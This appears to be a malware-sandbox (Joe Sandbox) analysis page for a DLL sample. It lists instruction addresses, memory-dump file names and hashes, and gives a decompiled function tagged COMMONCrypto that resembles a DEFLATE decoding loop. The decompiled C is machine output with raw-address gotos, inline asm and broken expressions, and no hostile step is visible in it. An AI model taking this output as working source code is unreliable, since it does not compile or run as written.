0x7fef3060a95
0x7fef3060a9a
0x7fef3060aa2
0x7fef3060aa7
0x7fef3060aac
0x7fef3060aaf
0x7fef3060abc
0x7fef3060ac1
0x7fef3060ac7
0x7fef3060ad0
0x7fef3060ad5
0x7fef3060ade
0x7fef3060ae6
0x7fef3060aea
0x7fef3060af6
0x7fef3060afe
0x7fef3060b0b
0x7fef3060b14
0x7fef3060b18
0x7fef3060b21
0x7fef3060b27
0x7fef3060b34
0x7fef3060b39
0x7fef3060b3e
0x7fef3060b47
0x7fef3060b4e
0x7fef3060b52
0x7fef3060b56
0x7fef3060b59
0x7fef3060b63
0x7fef3060b66
0x7fef3060b6b
0x7fef3060b73
0x7fef3060b77
0x7fef3060b7b
0x7fef3060b80
0x7fef3060b85
0x7fef3060b8b
0x7fef3060b8e
0x7fef3060b92
0x7fef3060b97
0x7fef3060b9f
0x7fef3060ba4
0x7fef3060ba8
0x7fef3060bab
0x7fef3060bae
0x7fef3060bb3
0x7fef3060bb5
0x7fef3060bb9
0x7fef3060bbc
0x7fef3060bbf
0x7fef3060bc1
0x7fef3060bc5
0x7fef3060bc8
0x7fef3060bcb
0x7fef3060bd0
0x7fef3060bd3
0x7fef3060bd8
0x7fef3060bdb
0x7fef3060bde
0x7fef3060be3
0x7fef3060be6
0x7fef3060beb
0x7fef3060bee
0x7fef3060bf1
0x7fef3060bf3
0x7fef3060bf7
0x7fef3060bfa
0x7fef3060bfd
0x7fef3060bff
0x7fef3060c03
0x7fef3060c06
0x7fef3060c09
0x7fef3060c0b
0x7fef3060c0e
0x7fef3060c19
0x7fef3060c1b
0x7fef3060c1f
0x7fef3060c22
0x7fef3060c25
0x7fef3060c27
0x7fef3060c2b
0x7fef3060c2e
0x7fef3060c47
0x7fef3060c49
0x7fef3060c52
0x7fef3060c68
0x7fef3060c73
0x7fef3060c76
0x7fef3060c7f
0x7fef3060c83
0x7fef3060c90
0x7fef3060c98
0x7fef3060c9a
0x7fef3060ca5
0x7fef3060cae
0x7fef3060cb1
0x7fef3060cb6
0x7fef3060cb9
0x7fef3060cbb
0x7fef3060cc0
0x7fef3060cc7
0x7fef3060cdd
0x7fef3060ce5
0x7fef3060ced
0x7fef3060cf5
0x7fef3060cf9
0x7fef3060cfc
0x7fef3060cff
0x7fef3060d0a
0x7fef3060d10
0x7fef3060d13
0x7fef3060d1c
0x7fef3060d1f
0x7fef3060d25
0x7fef3060d2d
0x7fef3060d3d
0x7fef3060d43
0x7fef3060d47
0x7fef3060d4a
0x7fef3060d52
0x7fef3060d55
0x7fef3060d5d
0x7fef3060d68
0x7fef3060d80
0x7fef3060d88
0x7fef3060d9d
0x7fef3060da0
0x7fef3060da5
0x7fef3060dae
0x7fef3060db6
0x7fef3060dbe
0x7fef3060dc2
0x7fef3060dca
0x7fef3060dd3
0x7fef3060de7
0x7fef3060dfe
0x7fef3060e05
0x7fef3060e0c
0x7fef3060e13
0x7fef3060e1a
0x7fef3060e25
0x7fef3060e2d
0x7fef3060e38
0x7fef3060e3a
0x7fef3060e42
0x7fef3060e53
0x7fef3060e5a
0x7fef3060e61
0x7fef3060e65
0x7fef3060e6b
0x7fef3060e6f
0x7fef3060e8f
0x7fef3060e91
0x7fef3060e98
0x7fef3060e98
0x7fef3060e9c
0x7fef3060ea3
0x7fef3060ec1
0x7fef3060ec8
0x7fef3060ed3
0x7fef3060ee9
0x7fef3060ef5
0x7fef3060ef8
0x7fef3060efe
0x7fef3060f06
0x7fef3060f1e
0x7fef3060f23
0x7fef3060f2b
0x7fef3060f33
0x7fef3060f38
0x7fef3060f3e
0x7fef3060f54
0x7fef3060f5b
0x7fef3060f62
0x7fef3060f69
0x7fef3060f79
0x7fef3060f80
0x7fef3060f80
0x7fef3060f84
0x7fef3060f8b
0x7fef3060f8d
0x7fef3060f95
0x7fef3060f9f
0x7fef3060fa6
0x7fef3060fad
0x7fef3060fad
0x7fef3060fb1
0x7fef3060fb4
0x7fef3060fb8
0x7fef3060fc2
0x7fef3060fe9
0x7fef3060ff1
0x7fef3060ff8
0x7fef3060ff8
0x7fef3060ffc
0x7fef3061003
0x7fef306100c
0x7fef3061033
0x7fef306103a
0x7fef306103a
0x7fef306103e
0x7fef3061045
0x7fef3061051
0x7fef3061059
0x7fef3061060
0x7fef306107e
0x7fef3061097
0x7fef30610a8
0x7fef30610bb
0x7fef30610c2
0x7fef30610c4
0x7fef30610d6
0x7fef30610eb
0x7fef30610f2
0x7fef30610f7
0x7fef30610ff
0x7fef3061101
0x7fef3061109
0x7fef306112c
0x7fef3061137
0x7fef3061139
0x7fef306113d
0x7fef3061140
0x7fef3061142
0x7fef3061156
0x7fef306115c
0x7fef3061160
0x7fef3061163
0x7fef3061167
0x7fef3061177
0x7fef3061188
0x7fef306118c
0x7fef306118f
0x7fef30611a6

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b4e47fe91e122037fa64b16500750dc58ea98351f63623b34e0674ce343335c
Instruction ID: d24c963118aef63590e1bf613de3876c2a6cf8102d10d5a2117340f852ebffd2
Opcode Fuzzy Hash: 6b4e47fe91e122037fa64b16500750dc58ea98351f63623b34e0674ce343335c
Instruction Fuzzy Hash: 79E1D673B0C3C58BD7A48F29E4403AAB7E6F788794F148236DA9997B98D63CD441DB00

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF305FF8F Relevance: .3, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 41%

			E000007FE7FEF305FF8F(void* __edx, signed int __rdi, void* __r8, void* __r10, void* __r11, void* __r12, long long __r13, void* __r14, void* __r15) {
				signed int _t394;
				signed int _t395;
				signed int _t396;
				signed char _t397;
				signed char _t404;
				signed int _t412;
				signed int _t415;
				signed int _t418;
				unsigned int _t423;
				signed int _t424;
				short _t426;
				signed int _t440;
				signed short _t442;
				signed int _t443;
				signed int _t445;
				signed int _t453;
				signed short _t455;
				signed char _t464;
				signed int _t470;
				signed int _t473;
				unsigned int _t477;
				signed int _t506;
				signed int _t509;
				signed char _t510;
				signed int _t519;
				unsigned int _t528;
				signed int _t529;
				short _t531;
				signed char _t546;
				signed char _t548;
				signed int _t552;
				signed int _t553;
				signed char _t555;
				signed char _t561;
				signed int _t565;
				signed char _t569;
				signed int _t572;
				signed char _t591;
				unsigned int _t598;
				signed char _t600;
				signed int _t610;
				signed int _t616;
				signed int _t629;
				signed int _t630;
				signed int _t636;
				signed short _t639;
				signed int _t644;
				signed int _t645;
				signed short _t648;
				void* _t652;
				signed int _t655;
				signed int _t661;
				signed int _t664;
				signed int _t667;
				signed char _t669;
				signed int _t686;
				signed int _t688;
				signed int _t712;
				signed int _t715;
				void* _t717;
				void* _t740;
				signed int _t750;
				void* _t752;
				void* _t781;
				short _t789;
				void* _t794;
				signed int _t822;
				signed int _t823;
				void* _t827;
				void* _t830;
				void* _t832;
				signed int _t840;
				signed long long _t845;
				signed long long _t849;
				signed long long _t850;
				signed long long _t856;
				signed long long _t857;
				long long _t873;
				signed int _t882;
				signed long long _t883;
				signed long long _t884;
				signed long long _t888;
				signed long long _t889;
				signed long long _t890;
				signed long long _t891;
				signed long long _t892;
				signed long long _t893;
				signed long long _t894;
				signed long long _t896;
				void* _t897;
				long long* _t904;
				void* _t906;
				long long _t907;
				signed long long _t909;
				signed long long _t913;
				signed long long _t914;
				signed long long _t924;
				intOrPtr _t932;
				void* _t934;
				long long _t937;
				signed long long _t938;
				intOrPtr _t939;
				signed long long _t941;
				signed long long _t946;
				unsigned long long _t947;
				signed long long _t955;
				unsigned long long _t958;
				unsigned long long _t959;
				intOrPtr _t968;
				signed long long _t973;
				unsigned long long _t975;
				signed long long _t982;
				signed long long _t983;
				signed long long _t987;
				signed long long _t991;
				intOrPtr _t993;
				void* _t995;
				signed long long _t1004;
				long long _t1008;
				void* _t1009;
				signed long long _t1012;
				signed char* _t1017;
				signed long long _t1021;
				signed long long _t1022;
				signed long long _t1023;
				signed long long _t1025;
				void* _t1030;
				signed long long _t1041;
				void* _t1043;
				void* _t1046;
				long long _t1047;
				void* _t1051;
				intOrPtr _t1054;
				void* _t1056;
				intOrPtr _t1063;
				intOrPtr _t1066;
				long long _t1068;
				signed char* _t1071;
				intOrPtr _t1074;
				intOrPtr _t1075;
				intOrPtr _t1076;
				intOrPtr _t1078;
				signed long long _t1079;
				long long _t1084;
				signed char* _t1087;
				long long _t1095;
				signed char* _t1098;
				void* _t1105;
				void* _t1108;
				void* _t1109;
				void* _t1113;
				void* _t1114;
				signed int* _t1115;
				signed long long _t1121;

				_t394 =  *(_t1043 + 0x40);
				r12b = 0x15;
				if (_t394 - 0xff > 0) goto 0xf305f43b;
				_t717 = __r8 -  *((intOrPtr*)(_t1043 + 0x1a8));
				if (_t717 == 0) goto 0xf3061262;
				if (_t717 >= 0) goto 0xf3061284;
				 *(__r11 + __r8) = _t394;
				_t1046 = __r8 + 1;
				r12b = 0xc;
				_t395 =  *(_t1043 + 0x38);
				if (_t395 - 0xe > 0) goto 0xf30600a1;
				_t924 = __r15 - __r14;
				if (_t924 - 1 > 0) goto 0xf3060085;
				_t528 =  *((short*)(__r10 + 0xddc + _t924 * 2));
				if (_t528 < 0) goto 0xf3060019;
				if ((_t528 & 0x0000ffff) - 0x200 < 0) goto 0xf3060056;
				_t529 = _t528 >> 9;
				if (_t395 - _t529 < 0) goto 0xf3060056;
				goto 0xf30600a1;
				if (_t395 - 0xb < 0) goto 0xf3060056;
				asm("dec eax");
				asm("adc ecx, 0x0");
				if ( !_t529 - 0x23f > 0) goto 0xf30611b9;
				_t531 =  *((short*)(__r10 + 0x15dc + _t924 * 2));
				if (_t531 >= 0) goto 0xf3060051;
				if (_t395 - 0xc >= 0) goto 0xf3060023;
				if (_t531 >= 0) goto 0xf30600a1;
				if (__r14 == __r15) goto 0xf3060156;
				_t1022 = _t1021 << _t395;
				_t946 =  *(_t1043 + 0x30) | _t1022;
				 *(_t1043 + 0x30) = _t946;
				_t396 = _t395 + 8;
				 *(_t1043 + 0x38) = _t396;
				if (_t396 - 0xe <= 0) goto 0xf305ffed;
				goto 0xf30600a1;
				_t1023 = _t1022 << _t396;
				_t947 = _t946 | _t1023;
				 *(_t1043 + 0x30) = _t947;
				_t397 = _t396 + 0x10;
				 *(_t1043 + 0x38) = _t397;
				_t636 =  *((short*)(__r10 + 0xddc + _t924 * 2));
				if (_t636 < 0) goto 0xf30600c3;
				goto 0xf30600ef;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !(_t636 & 0x000001ff) - 0x23f > 0) goto 0xf30611c7;
				_t639 =  *((short*)(__r10 + 0x15dc + __rdi * 2));
				if (_t639 < 0) goto 0xf30600c8;
				if (0xa == 0) goto 0xf30606cb;
				 *(_t1043 + 0x30) = _t947 >> 0xb;
				 *(_t1043 + 0x38) = _t397 - 0xb;
				if ((_t639 & 0x0000ffff) - 0x1d > 0) goto 0xf306013e;
				 *(_t1043 + 0x44) =  *(__rdi + 0xf311ef48) & 0x000000ff;
				 *(_t1043 + 0x3c) =  *(0xf311ef68 + __rdi * 2) & 0x0000ffff;
				_t544 =  ==  ? 0x1601 : 0x1001;
				r12d = 0x2101;
				r12d = r12d & 0x00003700;
				_t736 =  ==  ? 0x1601 : 0x1001;
				if (( ==  ? 0x1601 : 0x1001) == 0) goto 0xf305ffd4;
				goto 0xf3060485;
				r12d =  *(_t1043 + 0x7c);
				goto 0xf3060149;
				_t546 =  *(_t1043 + 0x38);
				_t509 =  *(_t1043 + 0x50);
				if (_t546 - 8 >= 0) goto 0xf3060565;
				if (__r15 == __r15) goto 0xf306019f;
				 *(_t1043 + 0x30) =  *(_t1043 + 0x30) | _t1023 << _t546;
				 *(_t1043 + 0x38) = _t546 + 8;
				_t1105 = __r15 + 1;
				goto 0xf30601a4;
				if ((bpl & 0x00000002) == 0) goto 0xf3060172;
				_t845 =  *((intOrPtr*)(_t1043 + 0x1a8));
				_t740 = _t1046 - _t845;
				if (_t740 == 0) goto 0xf3061238;
				if (_t740 >= 0) goto 0xf3061284;
				 *((char*)(__r11 + _t1046)) =  *(_t1043 + 0x3c);
				_t1047 = _t1046 + 1;
				r12d = 0x11;
				r12d =  ==  ? 6 : r12d;
				 *(_t1043 + 0x40) =  *(_t1043 + 0x40) - 1;
				r12d =  ==  ? 6 : r12d;
				 *((long long*)(_t1043 + 0x70)) = __r13;
				r13d =  *(_t1043 + 0x3c);
				_t1025 =  *((intOrPtr*)(_t1043 + 0x1a8));
				if (_t1047 == _t1025) goto 0xf3060b97;
				_t906 = _t1025 - _t1047;
				_t1008 = _t1047;
				_t907 =  >=  ? _t845 : _t906;
				 *((long long*)(_t1043 + 0x28)) =  *(_t1043 + 0xb8);
				 *((long long*)(_t1043 + 0x20)) = _t907;
				_t1068 = _t1008;
				E000007FE7FEF30616A0();
				_t1074 =  *((intOrPtr*)(_t1043 + 0x58));
				_t1051 = _t1008 + _t907;
				r12b = 0xc;
				 *(_t1043 + 0x40) =  *(_t1043 + 0x40) - _t509;
				if (_t906 != _t845) goto 0xf3060208;
				_t1095 =  *((intOrPtr*)(_t1043 + 0x70));
				r12b = 3;
				if ( *((intOrPtr*)(_t1074 + 0x18)) == 0) goto 0xf305f43b;
				_t548 =  *(_t1043 + 0x38);
				_t993 =  *((intOrPtr*)(_t1043 + 0xe0));
				_t686 =  >=  ? r14d : _t548 >> 3;
				_t510 = _t1025 * 8;
				_t404 = (_t548 & 0xfffffff8) - _t510;
				 *(_t1043 + 0x38) = _t404;
				_t1108 = _t1105 - __r15 + _t993 - _t1025;
				if (_t1108 - _t993 > 0) goto 0xf30613c7;
				_t1109 = _t1108 + _t1095;
				 *(_t1043 + 0x30) =  !(0xffffffff << (_t404 & 0x00000038)) &  *(_t1043 + 0x30) >> (_t548 & 0x00000007);
				r12b = 0x18;
				if (( *(_t1043 + 0x1b8) & 0x00000001) == 0) goto 0xf305f43b;
				 *(_t1043 + 0x40) = 0;
				r12b = 0x17;
				_t552 =  *(_t1043 + 0x40) & 0x000001ff;
				 *(_t1043 + 0x40) = _t552;
				r12b = 0x14;
				if (_t552 == 0x100) goto 0xf305f43b;
				r12b = 0x20;
				if (_t552 - 0x11d > 0) goto 0xf305f43b;
				_t553 =  *(_t845 + 0xf311eee8) & 0x000000ff;
				_t750 = _t553;
				r12b = _t750 == 0;
				 *(_t1043 + 0x44) = _t553;
				 *(_t1043 + 0x40) =  *(0xf311ef08 + _t845 * 2) & 0x0000ffff;
				r12b = r12b | 0x0000000e;
				r9d =  *(_t1043 + 0x3c);
				if (_t750 >= 0) goto 0xf3060382;
				r12b = 0x1d;
				if ( *((intOrPtr*)(_t1043 + 0xf4)) != 0) goto 0xf305f43b;
				_t1009 = _t1051 + 0xf311ef08;
				_t955 =  *((intOrPtr*)(_t1043 + 0x1a8));
				_t752 = _t1009 - _t955;
				if (_t752 > 0) goto 0xf30603b1;
				_t849 = (_t1051 - _t1068 &  *(_t1043 + 0xb8)) - _t1051;
				if (_t752 < 0) goto 0xf3060a9a;
				if (_t849 - 0xf311ef08 >= 0) goto 0xf3060a9a;
				r12d = 0x13;
				r12d =  ==  ? 0xc : r12d;
				_t412 =  *(_t1043 + 0x40);
				_t644 =  *(_t1043 + 0x50);
				if (_t412 - 3 > 0) goto 0xf3060605;
				_t555 =  *(_t1043 + 0x38);
				if (_t555 == 0) goto 0xf3060421;
				_t1030 = _t1109;
				if (_t555 - 8 >= 0) goto 0xf3060436;
				if (_t1030 == __r15) goto 0xf3060413;
				_t909 =  *(_t1043 + 0x30) | _t955 << _t555;
				 *(_t1043 + 0x30) = _t909;
				 *(_t1043 + 0x38) = _t555 + 8;
				r12d = 0;
				goto 0xf3060419;
				r12d = _t644;
				if ((r12b & 0x00000002) == 0) goto 0xf30603e8;
				goto 0xf306046a;
				if (_t1030 + 1 == __r15) goto 0xf3060464;
				goto 0xf3060453;
				_t958 = _t909 >> 8;
				 *(_t1043 + 0x30) = _t958;
				 *(_t1043 + 0x38) = ( *(_t1074 + 0x14) << 8) + 0xfffffff8;
				_t616 =  *(_t1074 + 0x14) << 8;
				_t561 = _t510 & 0x000000ff | _t616;
				 *(_t1074 + 0x14) = _t561;
				 *(_t1043 + 0x40) = _t412 + 1;
				r12d = 0;
				goto 0xf306046a;
				r12d = _t644;
				if (r12b == 0) goto 0xf30603cf;
				if ((r12b & 0xffffffff) == 1) goto 0xf30606d0;
				goto 0xf3060c1b;
				_t415 = _t561 & 0x000000ff;
				if (_t415 == 1) goto 0xf30606d0;
				goto 0xf3060c27;
				_t688 =  !_t686 & _t616;
				_t959 = _t958 >> _t415;
				 *(_t1043 + 0x30) = _t959;
				 *(_t1043 + 0x38) = _t510;
				 *(_t1043 + 0x40) =  *(_t1043 + 0x40) + _t688;
				r12b = 0xf;
				goto 0xf305f43b;
				 *(_t1043 + 0x30) = _t959 >> _t415;
				 *(_t1043 + 0x38) = _t510;
				 *(_t1043 + 0x3c) =  *(_t1043 + 0x3c) + ( !_t688 & _t616);
				r12b = 0x16;
				goto 0xf305f43b;
				 *(_t1043 + 0x30) = _t909 >> _t415;
				 *(_t1043 + 0x38) = _t644;
				 *(_t1043 + 0x80) = _t849;
				 *(_t1043 + 0x88) = _t849;
				 *((long long*)(_t1043 + 0x90)) = 0xb;
				_t565 =  *(_t1043 + 0x3c);
				_t850 = _t849 & 0xf311ef08;
				if (3 == 3) goto 0xf30612f1;
				if (_t565 != 0x10) goto 0xf30606d9;
				if (_t1009 - 1 - 0x1c9 >= 0) goto 0xf3061307;
				goto 0xf30606db;
				 *(_t1043 + 0x30) = _t850 >> 8;
				 *(_t1043 + 0x38) = _t565 + 0xfffffff8;
				 *(_t1043 + 0x3c) = 3;
				r12b = 0x12;
				goto 0xf305f43b;
				_t418 =  *(_t1074 + 0x291d) & 0x0000ffff;
				 *(_t1043 + 0x40) = _t418;
				r12b = 0x1e;
				if (_t418 != 0x2101) goto 0xf305f43b;
				r12b = 0x14;
				if (_t418 == 0) goto 0xf305f43b;
				r12d = 0x11;
				r12d =  ==  ? 6 : r12d;
				goto 0xf305f43b;
				r8d = 0x120;
				_t932 =  *((intOrPtr*)(_t1043 + 0x128));
				E000007FE7FEF30F24C0();
				_t1075 =  *((intOrPtr*)(_t1043 + 0x58));
				 *(_t1043 + 0x40) = 0;
				r12b = 9;
				goto 0xf305f43b;
				r12b = 0x18;
				goto 0xf305f43b;
				if (_t850 - 0xf >= 0) goto 0xf3060746;
				r9d =  *(_t1043 + 0x6c);
				if (_t932 - 1 > 0) goto 0xf3060acc;
				_t569 =  *(_t1043 + 0x38);
				_t423 =  *((short*)(_t1075 + 0x3c + _t850 * 2));
				if (_t423 < 0) goto 0xf3060659;
				if ((_t423 & 0x0000ffff) - 0x200 < 0) goto 0xf3060699;
				_t424 = _t423 >> 9;
				if (_t569 - _t424 < 0) goto 0xf3060699;
				goto 0xf3060aec;
				if (_t569 - 0xb < 0) goto 0xf3060699;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t424 - 0x23f > 0) goto 0xf3061218;
				_t426 =  *((short*)(_t1075 + 0x83c + _t850 * 2));
				if (_t426 >= 0) goto 0xf3060690;
				if (_t569 - 0xc >= 0) goto 0xf3060663;
				if (_t426 >= 0) goto 0xf3060aec;
				if (__r15 == __r15) goto 0xf3061245;
				_t1113 = __r15 + 1;
				 *(_t1043 + 0x30) =  *(_t1043 + 0x30) | _t850 << _t569;
				 *(_t1043 + 0x38) = _t932 + 8;
				_t781 = _t569 - 6;
				if (_t781 <= 0) goto 0xf3060631;
				goto 0xf3060aee;
				r12w = 0x2200;
				r12d = r12d >> 8;
				goto 0xf305f43b;
				_t995 =  *((intOrPtr*)(_t1043 + 0x80 + _t850 * 8)) + (_t909 & 0xffffffff);
				if (_t781 < 0) goto 0xf30613e0;
				if (_t995 + _t1009 - 0x1c9 > 0) goto 0xf30613f4;
				if (_t995 == 0) goto 0xf3060718;
				E000007FE7FEF30F24C0();
				 *(_t1043 + 0x40) =  *(_t1043 + 0x40) + _t644;
				r12b = 0xa;
				_t1076 =  *((intOrPtr*)(_t1043 + 0x58));
				_t1084 =  *((intOrPtr*)(_t1043 + 0x1a0));
				_t1054 =  *((intOrPtr*)(_t1043 + 0x70));
				goto 0xf305f43b;
				r12b = 0x1a;
				goto 0xf305f43b;
				r12b = 0x22;
				goto 0xf305f43b;
				goto 0xf3060aee;
				_t661 =  *(_t1043 + 0x38);
				 *(_t1043 + 0x68) =  *(_t1043 + 0x3c);
				r9d =  *(_t1043 + 0x44);
				_t856 = __r15 - _t1113;
				r12b = 0xc;
				if (_t856 - 0xe < 0) goto 0xf3060b66;
				if (_t661 - 0x1d > 0) goto 0xf3060794;
				_t857 = _t856 << _t661;
				_t1114 = _t1113 + 4;
				_t572 =  *((short*)(_t1076 + 0x3c + _t857 * 2));
				if (_t572 < 0) goto 0xf30607bc;
				if (0x2101 - 0x200 < 0) goto 0xf30611d8;
				goto 0xf30607e8;
				asm("dec eax");
				asm("adc ecx, 0x0");
				if ( !_t572 - 0x23f > 0) goto 0xf306126f;
				_t789 =  *((short*)(_t1076 + 0x83c +  &(( *(_t1043 + 0xe8))[_t1009]) * 2));
				if (_t789 < 0) goto 0xf30607c1;
				asm("bt ebp, 0x8");
				if (_t789 < 0) goto 0xf30608a8;
				_t440 =  *((short*)(_t1076 + 0x3c + _t857 * 2));
				if (_t440 < 0) goto 0xf3060820;
				if ((_t440 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf306084b;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t440 - 0x23f > 0) goto 0xf306127b;
				_t442 =  *((short*)(_t1076 + 0x83c + _t857 * 2));
				if (_t442 < 0) goto 0xf3060825;
				_t443 = _t442 & 0x0000ffff;
				_t794 = _t1054 -  *((intOrPtr*)(_t1043 + 0x1a8));
				if (_t794 >= 0) goto 0xf3061284;
				_t664 = _t661 + 0x20;
				 *(_t1084 + _t1054) = bpl;
				_t934 = _t1054 + 1;
				asm("bt eax, 0x8");
				if (_t794 < 0) goto 0xf30608a3;
				_t968 =  *((intOrPtr*)(_t1043 + 0x1a8));
				if (_t934 - _t968 >= 0) goto 0xf30612a2;
				 *(_t1084 + _t1054 + 1) = _t443;
				if (_t968 - _t1054 + 2 - 0x103 < 0) goto 0xf3060b66;
				goto 0xf3060773;
				_t1056 = _t934;
				_t445 = _t443 & 0x000001ff;
				if (_t445 == 0x100) goto 0xf3060b5e;
				if (_t445 - 0x11d > 0) goto 0xf3061298;
				if (_t664 - 0x1d > 0) goto 0xf30608ec;
				if (__r15 - _t1114 - 3 <= 0) goto 0xf306140a;
				_t1115 = _t1114 + 4;
				r9d =  *0x7FEF311EEE7 & 0x000000ff;
				if (r9b == 0) goto 0xf306092b;
				_t453 =  *((short*)(_t1076 + 0xdda));
				if (_t453 < 0) goto 0xf3060955;
				if ((_t453 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf3060980;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t453 - 0x23f > 0) goto 0xf306127b;
				_t455 =  *((short*)(_t1076 + 0x15da));
				if (_t455 < 0) goto 0xf306095a;
				_t667 = _t664 + 0x20 - r9d - 0xb;
				if ((_t455 & 0x1ff) - 0x1d > 0) goto 0xf30612ae;
				r9d =  *0x7FEF311EF47 & 0x000000ff;
				 *(_t1043 + 0x68) =  *0x7FEF311EF66 & 0x0000ffff;
				 *((long long*)(_t1043 + 0x118)) = _t1068;
				if (r9d == 0) goto 0xf3060a01;
				if (_t667 - 0x1d > 0) goto 0xf30609e2;
				if (__r15 - _t1115 - 3 <= 0) goto 0xf306140a;
				_t1004 = ((( *(_t1043 + 0x30) | _t857) >> 0x0000000a >> 0xb | __r15 - _t1114 << _t664) >> r9d >> 0xb | 0xffffffff << r9d << _t667) >> r9d;
				_t669 = _t667 + 0x20 - r9d;
				 *(_t1043 + 0x68) = ( !( *_t1115) & _t644) +  *(_t1043 + 0x68);
				r9d =  *(_t1043 + 0x68);
				if (_t1056 - _t1068 >= 0) goto 0xf3060a19;
				if ( *((intOrPtr*)(_t1043 + 0xf4)) != 0) goto 0xf30612b6;
				 *((long long*)(_t1043 + 0x70)) = _t1095;
				 *((long long*)(_t1043 + 0x120)) = 0xf311ef68;
				 *((long long*)(_t1043 + 0x28)) =  *(_t1043 + 0xb8);
				 *((long long*)(_t1043 + 0x20)) = 0xf311ef68;
				_t937 = _t1084;
				_t973 =  *((intOrPtr*)(_t1043 + 0x1a8));
				E000007FE7FEF306148C(_t937, _t973, _t1056, _t1068);
				if ( *((intOrPtr*)(_t1043 + 0x1a8)) - _t1056 +  *((intOrPtr*)(_t1043 + 0x120)) - 0x103 >= 0) goto 0xf306076a;
				goto 0xf3060b66;
				 *(_t1043 + 0x40) = _t669;
				goto 0xf305f43b;
				_t873 =  *(_t1043 + 0xb8);
				 *((long long*)(_t1043 + 0x28)) = _t873;
				 *((long long*)(_t1043 + 0x20)) = _t937;
				_t938 =  *((intOrPtr*)(_t1043 + 0x1a0));
				_t464 = E000007FE7FEF306148C(_t938, _t973, _t937,  *((intOrPtr*)(_t1043 + 0x118)));
				_t1078 =  *((intOrPtr*)(_t1043 + 0x58));
				r12b = 0xc;
				goto 0xf305f43b;
				_t591 = _t464;
				_t975 = _t973 << _t591 |  *(_t1043 + 0x30);
				 *(_t1043 + 0x30) = _t975;
				 *(_t1043 + 0x38) = _t464 + 0x10;
				goto 0xf3060aee;
				_t645 =  *((short*)(_t1078 + 0x3c + _t938 * 2));
				if (_t645 < 0) goto 0xf3060b0d;
				goto 0xf3060b39;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !(_t645 & 0x000001ff) - 0x23f > 0) goto 0xf30611c7;
				_t648 =  *((short*)(_t1078 + 0x83c + _t1004 * 2));
				if (_t648 < 0) goto 0xf3060b12;
				r12b = 0x22;
				if (0xa == 0) goto 0xf305f43b;
				 *(_t1043 + 0x30) = _t975 >> 0xb;
				 *(_t1043 + 0x38) = _t591 - 0xb;
				 *(_t1043 + 0x40) = _t648 & 0x0000ffff;
				r12b = 0xd;
				goto 0xf305f43b;
				r12b = 0x14;
				 *(_t1043 + 0x30) = _t1004;
				 *(_t1043 + 0x38) = _t669;
				 *(_t1043 + 0x3c) =  *(_t1043 + 0x68);
				 *(_t1043 + 0x40) = 0x100;
				 *(_t1043 + 0x44) = r9d;
				goto 0xf305f43b;
				 *((char*)(_t938 + 8)) = 0xfd;
				 *_t938 = _t873;
				 *((long long*)(_t938 + 0x10)) = _t873;
				goto 0xf3061193;
				r12b = 0x13;
				goto 0xf3060c5a;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 2;
				_t1079 =  *((intOrPtr*)(_t1043 + 0x58));
				goto 0xf3060c14;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 3;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 9;
				goto 0xf3060c31;
				r12b = 0xe;
				goto 0xf3060bdb;
				r12b = 0x10;
				r9d = 2 >> 8 >> 8;
				goto 0xf3060c31;
				r12b = 0xb;
				goto 0xf3060bee;
				r12b = 0x11;
				r9d = 0x100 >> 8 >> 8;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0xa;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 5;
				goto 0xf3060c31;
				r9d = r12d;
				r12b = 8;
				goto 0xf3060c34;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0x17;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0xf;
				if (r9b == 1) goto 0xf3060c9a;
				_t470 = r9b & 0xffffffff;
				if (_t470 == 0xfc) goto 0xf3060cbe;
				_t598 =  *(_t1043 + 0x38);
				_t652 =  >=  ? _t470 - r15d + r14d : _t598 >> 3;
				_t473 = _t1004 * 8;
				 *(_t1043 + 0x38) = _t598 - _t473;
				_t1012 =  &(_t1115[1]);
				_t1041 =  *((intOrPtr*)(_t1043 + 0x1b0));
				goto 0xf3060cc0;
				_t939 =  *((intOrPtr*)(_t1043 + 0x1a8));
				if ( *((intOrPtr*)(_t1043 + 0x70)) != _t939) goto 0xf3060cbb;
				r9b = 2;
				r9b = r9b - (_t473 & 0xffffff00 | r12b == 0x00000017);
				_t1063 = _t939;
				goto 0xf3060cc0;
				r9b = 1;
				 *(_t1079 + 0x291c) = r12b;
				_t600 =  *(_t1043 + 0x38);
				 *(_t1079 + 8) = _t600;
				 *(_t1079 + 0x24) =  *(_t1043 + 0x3c);
				 *(_t1079 + 0x28) =  *(_t1043 + 0x40);
				 *(_t1079 + 0x2c) =  *(_t1043 + 0x44);
				 *_t1079 =  !(0xffffffff << _t600) &  *(_t1043 + 0x30);
				_t822 =  *(_t1043 + 0x1b8) & 0x00000040;
				if (_t822 != 0) goto 0xf3061169;
				if (_t822 == 0) goto 0xf3061169;
				_t823 = r9b;
